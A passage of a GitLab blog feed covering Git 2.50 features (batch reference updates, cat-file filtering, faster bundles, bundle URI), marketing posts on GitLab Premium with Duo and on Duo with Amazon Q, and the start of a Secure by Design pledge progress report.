$ git commit --allow-empty -m 1
$ git commit --allow-empty -m 2
$ git commit --allow-empty -m 3
$ git branch foo

# Print out the commit IDs
$ git rev-list HEAD
cf469bdf5436ea1ded57670b5f5a0797f72f1afc
5a74cd330f04b96ce0666af89682d4d7580c354c
5a6b339a8ebffde8c0590553045403dbda831518

# Attempt to create a new reference and update existing reference in transaction.
# Update is expected to fail because the specified old object ID doesn’t match.
$ git update-ref --stdin &lt;&lt;EOF
&gt; create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc
&gt; update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c
&gt; EOF
fatal: cannot lock ref 'refs/heads/foo': is at cf469bdf5436ea1ded57670b5f5a0797f72f1afc but expected 5a74cd330f04b96ce0666af89682d4d7580c354c

# The &quot;bar&quot; reference was not created.
$ git switch bar
fatal: invalid reference: bar
</code></pre>
<p>Compared to updating many references individually, updating in bulk is also
much more efficient. While this works well, there might be certain
circumstances where it is okay for a subset of the requested reference updates
to fail, but we still want to take advantage of the efficiency gains of bulk
updates.</p>
<p>With this release, <code>git-update-ref(1)</code> has the new <code>--batch-updates</code> option,
which allows the updates to proceed even when one or more reference updates
fails. In this mode, individual failures are reported in the following format:</p>
<pre><code class="language-text">rejected SP (&lt;old-oid&gt; | &lt;old-target&gt;) SP (&lt;new-oid&gt; | &lt;new-target&gt;) SP &lt;rejection-reason&gt; LF
</code></pre>
<p>This allows successful reference updates to proceed while providing context to
which updates were rejected and for what reason. Using the same example
repository from the previous example:</p>
<pre><code class="language-shell"># Attempt to create a new reference and update existing reference in transaction.
$ git update-ref --stdin --batch-updates &lt;&lt;EOF
&gt; create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc
&gt; update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c
&gt; EOF
rejected refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c incorrect old value provided

# The &quot;bar&quot; reference was created even though the update to &quot;foo&quot; was rejected.
$ git switch bar
Switched to branch 'bar'
</code></pre>
<p>This time, with the <code>--batch-updates</code> option, the reference creation succeeded
even though the update didn't work. This patch series lays the groundwork for
future performance improvements in <code>git-fetch(1)</code> and <code>git-receive-pack(1)</code>
when references are updated in bulk. For more information, check the
<a href="https://lore.kernel.org/git/20250408085120.614893-1-karthik.188@gmail.com/">mailing-list thread</a></p>
<p><em>This project was led by <a href="https://gitlab.com/knayakgl">Karthik Nayak</a>.</em></p>
<h2>New filter option for git-cat-file(1)</h2>
<p>With <a href="https://git-scm.com/docs/git-cat-file"><code>git-cat-file(1)</code></a>, it is possible
to print info for all objects contained in the repository via the
<code>--batch–all-objects</code> option. For example:</p>
<pre><code class="language-shell"># Setup simple repository.
$ git init
$ echo foo &gt;foo
$ git add foo
$ git commit -m init

# Create an unreachable object.
$ git commit --amend --no-edit

# Use git-cat-file(1) to print info about all objects including unreachable objects.
$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)'
commit 0b07e71d14897f218f23d9a6e39605b466454ece
tree 205f6b799e7d5c2524468ca006a0131aa57ecce7
blob 257cc5642cb1a054f08cc83f2d943e56fd3ebe99
commit c999f781fd7214b3caab82f560ffd079ddad0115
</code></pre>
<p>In some situations, a user might want to search through all objects in the
repository, but only output a subset based on some specified attribute. For
example, if we wanted to see only the objects that are commits, we could use
<code>grep(1)</code>:</p>
<pre><code class="language-shell">$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' | grep ^commit
commit 0b07e71d14897f218f23d9a6e39605b466454ece
commit c999f781fd7214b3caab82f560ffd079ddad0115
</code></pre>
<p>While this works, one downside with filtering the output is that
<code>git-cat-file(1)</code> still has to traverse all the objects in the repository, even
the ones that the user is not interested in. This can be rather inefficient.</p>
<p>With this release, <code>git-cat-file(1)</code> now has the <code>--filter</code> option, which only
shows objects matching the specified criteria. This is similar to the option of
the same name for <code>git-rev-list(1)</code>, but with only a subset of the filters
supported. The supported filters are <code>blob:none</code>, <code>blob:limit=</code>, as well as
<code>object:type=</code>. Similar to the previous example, objects can be filtered by
type with Git directly:</p>
<pre><code class="language-shell">$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' --filter='object:type=commit'
commit 0b07e71d14897f218f23d9a6e39605b466454ece
commit c999f781fd7214b3caab82f560ffd079ddad0115
</code></pre>
<p>Not only is it convenient for Git to handle the processing, for large
repositories with many objects, it is also potentially more efficient. If a
repository has bitmap indices, it becomes possible for Git to efficiently
lookup objects of a specific type, and thus avoid scanning through the
packfile, which leads to a significant speedup. Benchmarks conducted on the
<a href="https://github.com/chromium/chromium.git">Chromium repository</a> show
significant improvements:</p>
<pre><code class="language-text">Benchmark 1: git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter
   Time (mean ± σ):     82.806 s ±  6.363 s    [User: 30.956 s, System: 8.264 s]
   Range (min … max):   73.936 s … 89.690 s    10 runs

Benchmark 2: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag
   Time (mean ± σ):      20.8 ms ±   1.3 ms    [User: 6.1 ms, System: 14.5 ms]
   Range (min … max):    18.2 ms …  23.6 ms    127 runs

Benchmark 3: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit
   Time (mean ± σ):      1.551 s ±  0.008 s    [User: 1.401 s, System: 0.147 s]
   Range (min … max):    1.541 s …  1.566 s    10 runs

Benchmark 4: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree
   Time (mean ± σ):     11.169 s ±  0.046 s    [User: 10.076 s, System: 1.063 s]
   Range (min … max):   11.114 s … 11.245 s    10 runs

Benchmark 5: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob
   Time (mean ± σ):     67.342 s ±  3.368 s    [User: 20.318 s, System: 7.787 s]
   Range (min … max):   62.836 s … 73.618 s    10 runs

Benchmark 6: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none
   Time (mean ± σ):     13.032 s ±  0.072 s    [User: 11.638 s, System: 1.368 s]
   Range (min … max):   12.960 s … 13.199 s    10 runs

Summary
   git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag
    74.75 ± 4.61 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit
   538.17 ± 33.17 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree
   627.98 ± 38.77 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none
  3244.93 ± 257.23 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob
  3990.07 ± 392.72 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter
</code></pre>
<p>Interestingly, these results indicate that the computation time now scales with
the number of objects for a given type instead of the number of total objects
in the packfile. The original mailing-list thread can be found
<a href="https://lore.kernel.org/git/20250221-pks-cat-file-object-type-filter-v1-0-0852530888e2@pks.im/">here</a>.</p>
<p><em>This project was led by <a href="https://gitlab.com/pks-gitlab">Patrick Steinhardt</a>.</em></p>
<h2>Improved performance when generating bundles</h2>
<p>Git provides a means to generate an archive of a repository which contains a
specified set of references and accompanying reachable objects via the
<a href="https://git-scm.com/docs/git-bundle"><code>git-bundle(1)</code></a> command. This operation
is used by GitLab to generate repository backups and also as part of the
<a href="https://git-scm.com/docs/bundle-uri">bundle-URI</a> mechanism.</p>
<p>For large repositories containing millions of references, this operation can
take hours or even days. For example, with the main GitLab repository
(<a href="https://gitlab.com/gitlab-org/gitlab">gitlab-org/gitlab</a>), backup times were
around 48 hours. Investigation revealed there was a performance bottleneck due
to how Git was performing a check to avoid duplicated references being included
in the bundle. The implementation used a nested <code>for</code> loop to iterate and
compare all listed references, leading to O(N^2) time complexity. This scales
very poorly as the number of references in a repository increases.</p>
<p>In this release, this issue was addressed by replacing the nested loops with a
map data structure leading to a significant speedup. The following benchmark
the performance improvement for creating a bundle with a repository containing
100,000 references:</p>
<pre><code class="language-text">Benchmark 1: bundle (refcount = 100000, revision = master)
  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]
  Range (min … max):   14.237 s … 14.920 s    10 runs

Benchmark 2: bundle (refcount = 100000, revision = HEAD)
  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]
  Range (min … max):    2.364 s …  2.425 s    10 runs

Summary
  bundle (refcount = 100000, revision = HEAD) ran
    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)
</code></pre>
<p>To learn more, check out our blog post
<a href="https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/">How we decreased GitLab repo backup times from 48 hours to 41 minutes</a>.
You can also find the original mailing list thread
<a href="https://lore.kernel.org/git/20250401-488-generating-bundles-with-many-references-has-non-linear-performance-v1-0-6d23b2d96557@gmail.com/">here</a>.</p>
<p><em>This project was led by <a href="https://gitlab.com/knayakgl">Karthik Nayak</a>.</em></p>
<h2>Better bundle URI unbundling</h2>
<p>Through the <a href="https://git-scm.com/docs/bundle-uri">bundle URI</a> mechanism in Git,
locations to fetch bundles from can be provided to clients with the goal to
help speed up clones and fetches. When a client downloads a bundle, references
under <code>refs/heads/*</code> are copied from the bundle into the repository along with
their accompanying objects. A bundle might contain additional references
outside of <code>refs/heads/*</code> such as <code>refs/tags/*</code>, which are simply ignored when
using bundle URI on clone.</p>
<p>In Git 2.50, this restriction is lifted, and all references
matching <code>refs/*</code> contained in the downloaded bundle are copied.
<a href="https://github.com/schacon">Scott Chacon</a>, who contributed this functionality,
demonstrates the difference when cloning
<a href="https://gitlab.com/gitlab-org/gitlab-foss">gitlab-org/gitlab-foss</a>:</p>
<pre><code class="language-shell">$ git-v2.49 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.49
Cloning into 'gl2.49'...
remote: Enumerating objects: 1092703, done.
remote: Counting objects: 100% (973405/973405), done.
remote: Compressing objects: 100% (385827/385827), done.
remote: Total 959773 (delta 710976), reused 766809 (delta 554276), pack-reused 0 (from 0)
Receiving objects: 100% (959773/959773), 366.94 MiB | 20.87 MiB/s, done.
Resolving deltas: 100% (710976/710976), completed with 9081 local objects.
Checking objects: 100% (4194304/4194304), done.
Checking connectivity: 959668, done.
Updating files: 100% (59972/59972), done.

$ git-v2.50 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.50
Cloning into 'gl-2.50'...
remote: Enumerating objects: 65538, done.
remote: Counting objects: 100% (56054/56054), done.
remote: Compressing objects: 100% (28950/28950), done.
remote: Total 43877 (delta 27401), reused 25170 (delta 13546), pack-reused 0 (from 0)
Receiving objects: 100% (43877/43877), 40.42 MiB | 22.27 MiB/s, done.
Resolving deltas: 100% (27401/27401), completed with 8564 local objects.
Updating files: 100% (59972/59972), done.
</code></pre>
<p>Comparing these results, we see that Git 2.50 fetches 43,887 objects
(40.42 MiB) after the bundle was extracted whereas Git 2.49 fetches a
total of 959,773 objects (366.94 MiB). Git 2.50 fetches roughly 95% fewer
objects and 90% less data, which benefits both the client and the server. The
server needs to process a lot less data to the client and the client needs to
download and extract less data. In the example provided by Scott this led to a
speedup of 25%.</p>
<p>To learn more, check out the corresponding
<a href="https://lore.kernel.org/git/pull.1897.git.git.1740489585344.gitgitgadget@gmail.com/">mailing-list thread</a>.</p>
<p><em>This patch series was contributed by <a href="https://github.com/schacon">Scott Chacon</a>.</em></p>
<h2>Read more</h2>
<p>This article highlighted just a few of the contributions made by GitLab and
the wider Git community for this latest release. You can learn about these from
the <a href="https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/">official release announcement</a> of the Git project. Also, check
out our <a href="https://about.gitlab.com/blog/tags/git/">previous Git release blog posts</a>
to see other past highlights of contributions from GitLab team members.</p>
]]></content>
        <author>
            <name>Justin Tobler</name>
            <uri>https://about.gitlab.com/blog/authors/justin-tobler</uri>
        </author>
        <published>2025-06-16T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[AI-native GitLab Premium: Transform higher education software development]]></title>
        <id>https://about.gitlab.com/blog/ai-native-gitlab-premium-transform-higher-education-software-development/</id>
        <link href="https://about.gitlab.com/blog/ai-native-gitlab-premium-transform-higher-education-software-development/"/>
        <updated>2025-06-10T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Educational institutions increasingly rely on modern software development practices to support teaching, research, and administrative functions. As development needs grow more complex in university and college environments, GitLab Premium with Duo provides essential capabilities that address the unique challenges faced by higher education – particularly around open source development, remote collaboration, and enterprise-grade security.</p>
<p>GitLab's comprehensive, intelligent DevSecOps platform delivers value that extends far beyond fundamental version control. Built on an open source foundation with enterprise-grade features, GitLab Premium helps prevent costly security incidents involving student data, provides cloud-based development environments for distributed teams, and offers the professional support that educational institutions need for mission-critical systems. And now <a href="https://about.gitlab.com/blog/gitlab-premium-with-duo/">Premium includes GitLab Duo AI essentials</a> Code Suggestions and Chat at no additional cost.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1083723619?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;GitLab Premium with Duo Core&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>The unique development environment in higher education</h2>
<p>Universities and colleges operate in a distinctly challenging technical environment. Development teams must support multidisciplinary collaboration across technical and non-technical departments while managing vast amounts of sensitive data – from student records and financial information to research findings and faculty evaluations.</p>
<p>Most institutions face these challenges with limited IT resources, yet must support thousands of concurrent users across numerous projects and research initiatives. Research integrity requirements add another layer of complexity, as development work often needs to maintain traceability and reproducibility standards.</p>
<h2>Premium solutions for educational institutions</h2>
<p>GitLab Premium with Duo has the functionality that higher education needs.</p>
<h3>Enhanced collaboration and workflow capabilities</h3>
<p>Cross-departmental projects are common in educational settings – from multi-department research initiatives to custom module development for systems like Ellucian Banner, an enterprise resource planning application used by higher education. These complex projects require sophisticated workflow management that goes beyond basic version control.</p>
<p>GitLab Premium addresses these challenges with powerful collaboration and project visualization features, including epics, roadmaps, and advanced Kanban boards for Agile development workflows. When you assign multiple approvers to certain merge requests and protected branches, you ensure higher code quality and accountability across teams. These tools allow institutions to coordinate work across departments while aligning with institution-wide objectives – essential for managing multiphase campus technology initiatives.</p>
<p>In Australia, <a href="https://about.gitlab.com/customers/deakin-university/">Deakin University’s</a> enablement team uses GitLab to build standardized processes and reusable templates — such as custom merge request templates, templated build pipelines, and a security and compliance framework — that can be shared with the broader university community and citizen developers, driving innovation and collaboration both inside the university and with key partners. “We were trying to bring in a community of practice and help it thrive for quite some time, but we were never successful until we had this tool,” said Aaron Whitehand, director of Digital Enablement at Deakin University.</p>
<blockquote>
<h4>Read more about <a href="https://about.gitlab.com/customers/deakin-university/">how Deakin University uses GitLab to drive improvements</a> in collaboration and productivity, including a 60% reduction in manual tasks.</h4>
</blockquote>
<h3>Advanced data protection and governance</h3>
<p>Educational institutions generate and manage vast amounts of data, ranging from student records and financial information to research findings and faculty evaluations. The security stakes are particularly high. The <a href="https://universitybusiness.com/in-just-3-months-this-data-breach-has-compromised-nearly-900-institutions/">2023 MOVEit breach</a>, which spanned three months and compromised approximately 900 educational institutions, exposed the sensitive information of more than 62 million people. This demonstrates the critical need for proactive security measures integrated directly into higher education development workflows.</p>
<p>Vulnerability scanning stops code releases that contain security risks, enabling institutions to establish and enforce governance protocols that protect sensitive information. These capabilities help universities implement proper access controls and permission structures for research databases, creating a secure framework where authorized researchers maintain appropriate access – effectively balancing robust protection with necessary collaboration.</p>
<p>GitLab is built from the ground up to secure your source code. Scalable Git-based repositories, granular access controls, and built-in compliance features eliminate bottlenecks in your workflow while meeting security requirements. GitLab Premium provides audit tracking and compliance capabilities essential for educational environments. Complete audit trails capture detailed logs of all code changes, access attempts, and system modifications with timestamps and user attribution. Full change management documentation ensures traceability of who made what changes, when, and why – critical for research integrity – while access control auditing monitors repository access and permissions changes.</p>
<h3>Cloud-based development environments and remote collaboration</h3>
<p>Modern educational institutions require flexible development environments that support distributed teams, remote learning scenarios, and diverse technical requirements. GitLab Premium provides:</p>
<ul>
<li><strong><a href="https://docs.gitlab.com/user/workspace/">GitLab Workspaces</a>:</strong> Cloud-based development environments accessible from any device</li>
<li><strong><a href="https://docs.gitlab.com/user/project/web_ide/">Web IDE integration</a>:</strong> Browser-based coding with full GitLab feature integration</li>
<li><strong><a href="https://about.gitlab.com/blog/build-and-run-containers-in-remote-development-workspaces/">Container-based development</a>:</strong> Consistent, reproducible development environments across different projects and user groups</li>
</ul>
<p>These capabilities are particularly valuable for supporting remote and hybrid learning models, enabling students and researchers to access standardized development environments regardless of their physical location or local hardware constraints.</p>
<h3>Professional support for critical systems</h3>
<p>Small IT teams in educational settings often support large, complex infrastructure with minimal resources. Reaching out to user forums for answers doesn't always mean you'll get an accurate reply and isn't efficient for large teams. GitLab Premium includes dedicated professional support, providing faster issue resolution and upgrade assistance during critical periods like class enrollment or research deadlines.</p>
<p>This minimizes downtime for critical services and ensures continuity of operations during peak usage periods, giving stretched IT departments the enterprise-grade reliability they need for essential academic systems.</p>
<h3>Built on open source with enterprise capabilities</h3>
<p>Open source software is developed collaboratively in a public manner, with source code freely available for anyone to view, modify, and distribute. This development model fosters innovation through community contributions and ensures transparency in how software functions. GitLab's open source foundation resonates strongly with educational institutions' values around collaboration, transparency, and community contribution. GitLab Premium features extend this foundation with enterprise-grade capabilities while maintaining the ability to contribute back to the open source ecosystem.</p>
<p>Key open source advantages include:</p>
<ul>
<li><strong>Transparency:</strong> Complete visibility into platform capabilities and security measures – you can examine exactly how the software works</li>
<li><strong>Community contribution:</strong> Ability to contribute improvements back to the broader community and benefit from global developer expertise</li>
<li><strong>Vendor independence:</strong> Reduced lock-in risk with open source alternatives and the freedom to modify code as needed</li>
<li><strong>Co-creation opportunities:</strong> Collaborative development with the broader community, including other educational institutions, to build shared solutions</li>
</ul>
<h3>AI assistant for software development tasks</h3>
<p>GitLab Premium with <a href="https://about.gitlab.com/gitlab-duo/">Duo</a> brings powerful AI-native capabilities directly into the development workflow, including:</p>
<ul>
<li><a href="https://docs.gitlab.com/user/project/repository/code_suggestions/"><strong>Code Suggestions</strong></a>, which provides real-time code completion and suggestions, helping developers write code faster and more efficiently</li>
<li><a href="https://docs.gitlab.com/user/gitlab_duo_chat/"><strong>Chat</strong></a>, which allows team members to get instant answers to questions, troubleshoot issues, and access documentation directly within the GitLab environment</li>
</ul>
<p>These AI tools significantly enhance productivity, reduce errors, and streamline collaboration, making GitLab Premium an even more valuable asset for software development teams in higher education.</p>
<h3>Transparency at the core</h3>
<p>Higher education institutions handle incredibly sensitive data — from student records and research findings to proprietary academic work and federal grant information.</p>
<p>The <a href="https://about.gitlab.com/ai-transparency-center/">GitLab AI Transparency Center </a>demonstrates our commitment to transparency, accountability, and protection of customer data and intellectual property, providing the privacy guarantees that educational institutions require.</p>
<p>GitLab launched the AI Transparency Center to help customers, community, and team members better understand how GitLab upholds ethics and transparency in our AI-powered features.</p>
<p>Our publicly available documentation highlights the comprehensive measures we take to protect your institution's data and intellectual property. <a href="https://handbook.gitlab.com/handbook/legal/ethics-compliance-program/ai-ethics-principles/">GitLab's AI Ethics Principles for Product Development</a> guide us as we continue to build and evolve our AI functionality, helping higher education organizations harness the promise of AI while maintaining complete control and oversight of their most valuable information assets.</p>
<h2>Get started with GitLab Premium today</h2>
<p>For educational institutions, GitLab Premium with Duo represents a strategic technical investment that combines the benefits of open source development with enterprise-grade, AI-native capabilities. By providing professional-grade tools ready for the challenges familiar to the complex technical environment of higher education, GitLab Premium with Duo helps institutions address security vulnerabilities, streamline development workflows, and maintain the reliable infrastructure that academic and research operations depend on.</p>
<blockquote>
<p><a href="https://about.gitlab.com/solutions/public-sector/">Learn more about GitLab for Public Sector</a> or  <a href="https://about.gitlab.com/sales/">speak to our sales team today</a>.</p>
</blockquote>
<h2>Read more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/gitlab-premium-with-duo/">Unlocking AI for every GitLab Premium and Ultimate customer</a></li>
<li><a href="https://docs.gitlab.com/user/project/repository/code_suggestions/">GitLab Duo Code Suggestions</a></li>
<li><a href="https://docs.gitlab.com/user/gitlab_duo_chat/">GitLab Duo Chat</a></li>
</ul>
]]></content>
        <author>
            <name>Jessica Hurwitz</name>
            <uri>https://about.gitlab.com/blog/authors/jessica-hurwitz</uri>
        </author>
        <author>
            <name>Elisabeth Burrows</name>
            <uri>https://about.gitlab.com/blog/authors/elisabeth-burrows</uri>
        </author>
        <published>2025-06-10T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Speed up code reviews: Let AI handle the feedback implementation]]></title>
        <id>https://about.gitlab.com/blog/speed-up-code-reviews-let-ai-handle-the-feedback-implementation/</id>
        <link href="https://about.gitlab.com/blog/speed-up-code-reviews-let-ai-handle-the-feedback-implementation/"/>
        <updated>2025-06-10T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>You know that feeling when you've just submitted a merge request and the code review comments start rolling in? One reviewer wants the labels updated, another asks for side-by-side layouts, someone else requests bold formatting, and don't forget about that button color change. Before you know it, you're spending hours implementing feedback that, while important, takes you away from building new features. It's a time-consuming process that every developer faces, yet it feels like there should be a better way.</p>
<p>What if you could have an AI assistant that understands code review feedback and automatically implements the changes for you? That's exactly what <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q</a> brings to your development workflow. This seamless integration combines GitLab's comprehensive DevSecOps platform with Amazon Q's advanced AI capabilities, creating an intelligent assistant that can read reviewer comments and converts them directly into code changes. Instead of manually addressing each piece of feedback, you can let AI handle the implementation while you focus on the bigger picture.</p>
<h2>How GitLab Duo with Amazon Q works</h2>
<p>When you're viewing a merge request with reviewer comments, you'll see feedback scattered throughout your code. Let's take the examples from earlier in this article: maybe you've received a request to update a form label here, a suggestion to display fields side-by-side there, or a note about making certain text bold. Each comment represents a task that normally you'd need to handle manually.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673634/Blog/Content%20Images/1-show-comment.png" alt="feedback on an MR"></p>
<p>With GitLab Duo with Amazon Q, you can simply enter the <code>/q dev</code> quick action in a comment. This prompts Amazon Q to analyze all the feedback and start modifying your code automatically. The AI agent understands the context of each comment and implements the requested changes directly in your codebase.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673634/Blog/Content%20Images/2-invoke-q-dev.png" alt="/q dev function prompting Amazon Q to analyze feedback"></p>
<p>Once Amazon Q processes the feedback, you can view all the updates in the &quot;Changes&quot; tab of your merge request. Every modification is clearly visible, so you can verify that the AI agent correctly interpreted and implemented each piece of feedback. You can then run your updated application to confirm that all the changes work as expected — that form label is updated, the fields are displayed side-by-side, the text is bold, and yes, that button is now blue.</p>
<p>Watch the code review feedback process in action:</p>
<p>&lt;!-- blank line --&gt;
&lt;figure class=&quot;video_container&quot;&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/31E9X9BrK5s?si=ThFywR34V3Bfj1Z-&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt;
&lt;/figure&gt;
&lt;!-- blank line --&gt;</p>
<p>Processing code review feedback is a necessary but time-intensive part of software development.  GitLab Duo with Amazon Q evolves this manual process into an automated workflow, dramatically reducing the time between receiving feedback and implementing changes. By letting AI handle these routine modifications, you're free to focus on what really matters — building innovative features and solving complex problems.</p>
<p>With GitLab Duo with Amazon Q, you can:</p>
<ul>
<li>Eliminate hours of manual feedback implementation</li>
<li>Accelerate your code review cycles</li>
<li>Maintain consistency in how feedback is addressed</li>
<li>Reduce context switching between reviewing comments and writing code</li>
<li>Ship features faster with streamlined deployment times</li>
</ul>
<blockquote>
<h4>To learn more about GitLab Duo with Amazon Q visit us at an upcoming <a href="https://about.gitlab.com/events/aws-summits/">AWS Summit in a city near you</a> or <a href="https://about.gitlab.com/partners/technology-partners/aws/#form">reach out to your GitLab representative</a>.</h4>
</blockquote>
<h2>GitLab Duo with Amazon Q resources</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available</a></li>
<li><a href="https://about.gitlab.com/partners/technology-partners/aws/">GitLab and AWS partner page</a></li>
<li><a href="https://docs.gitlab.com/user/duo_amazon_q/">GitLab Duo with Amazon Q documentation</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
</ul>
]]></content>
        <author>
            <name>Cesar Saavedra</name>
            <uri>https://about.gitlab.com/blog/authors/cesar-saavedra</uri>
        </author>
        <published>2025-06-10T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Last year we signed the Secure by Design pledge - here's our progress]]></title>
        <id>https://about.gitlab.com/blog/last-year-we-signed-the-secure-by-design-pledge-heres-our-progress/</id>
        <link href="https://about.gitlab.com/blog/last-year-we-signed-the-secure-by-design-pledge-heres-our-progress/"/>
        <updated>2025-06-09T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>A little over a year go, GitLab signed <a href="https://about.gitlab.com/blog/secure-by-design-principles-meet-devsecops-innovation-in-gitlab-17/">CISA’s Secure by Design Pledge</a>, a directive for technology providers to embed security at the heart of their products from the outset of development. Since then, we've made significant progress towards improving our security posture and creating a more secure ecosystem for our customers to develop secure software faster.</p>
<h2>Meeting the security goals</h2>
<p>Let’s explore the additions and improvements we've made to further enhance security across the development lifecycle.</p>
<h3>Multi-factor authentication (MFA)</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.</strong></em></p>
<p>GitLab currently offers multiple <a href="https://docs.gitlab.com/ee/user/profile/account/two_factor_authentication.html">MFA</a> options for users to secure their accounts. We also offer SSO functionality to enable <a href="https://docs.gitlab.com/ee/user/group/saml_sso/">GitLab.com</a>, <a href="https://docs.gitlab.com/integration/saml/">Self-Managed</a>, and <a href="https://docs.gitlab.com/integration/saml/">GitLab Dedicated</a> customers to streamline their authentication processes and their internal MFA requirements.</p>
<p>To further enhance the platform’s resilience, and to create a more secure foundation for our customers, GitLab is executing a phased MFA by Default rollout.</p>
<p>In the coming months, we will deploy changes requiring all customers to enable MFA on their accounts.</p>
<p>For customers who already have MFA enabled or authenticate to GitLab via their organization’s single sign-on (SSO) method, there will be no necessary changes. For customers who do not already have MFA enabled and are not authenticating to GitLab via their organization’s SSO method, they will be required to enable MFA and enroll in one or more of the available MFA methods.</p>
<p>The MFA rollout will occur in stages to ensure a smooth and consistent adoption across all customers. More details on GitLab’s MFA by Default rollout will be shared in the near future.</p>
<h3>Default passwords</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.</strong></em></p>
<p>To reduce the use of default passwords, GitLab uses randomly generated root passwords for its multiple installation methods. GitLab’s multi-method <a href="https://docs.gitlab.com/ee/install/install_methods.html">installation instructions</a> also include guidance on how to change the randomly generated root password for each installation.</p>
<p>For some install methods, such as installing GitLab in a Docker container, the password file with the initial root password is deleted in the first container restart after 24 hours to help further harden the GitLab instance.</p>
<h3>Reducing entire classes of vulnerabilities</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.</strong></em></p>
<p>GitLab has published <a href="https://docs.gitlab.com/ee/development/secure_coding_guidelines.html#sast-coverage">secure coding guidelines</a> to its documentation site that contains descriptions and guidelines for addressing security vulnerabilities commonly identified in the GitLab codebase.</p>
<p>The guidelines are “intended to help developers identify potential security vulnerabilities early, with the goal of reducing the number of vulnerabilities released over time.”</p>
<p>GitLab continues to improve its <a href="https://docs.gitlab.com/development/secure_coding_guidelines#sast-coverage">SAST rule coverage</a> to address broader sets of security vulnerabilities for itself and its customers.</p>
<h3>Security patches</h3>
<p><em><strong>Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.</strong></em></p>
<p>GitLab handles all updates related to its GitLab.com and GitLab Dedicated service offerings. Additionally, GitLab publishes a <a href="https://docs.gitlab.com/ee/policy/maintenance.html">maintenance policy</a>, which outlines its approach to releasing updates, backporting, upgrade recommendations and supporting documentation, etc.</p>
<p>GitLab’s documentation has comprehensive guidance on <a href="https://docs.gitlab.com/ee/update/?tab=Self-compiled+%28source%29#upgrade-based-on-installation-method">how to upgrade</a> self-managed instances based on their deployment model. This includes Omnibus, Helm chart, Docker and self-compiled GitLab installations.</p>
<p>GitLab also provides a detailed <a href="https://docs.gitlab.com/ee/update/plan_your_upgrade.html">upgrade plan</a> to ensure proper testing and troubleshooting can be performed as well as rollback plans if necessary.</p>
<p>Depending on the version upgrade, specific changes (<a href="https://docs.gitlab.com/ee/update/versions/gitlab_17_changes.html">example for GitLab 17</a>) for each version are highlighted to ensure a smooth upgrade process and limit unavailability of services.</p>
<h3>Vulnerability disclosure policy</h3>
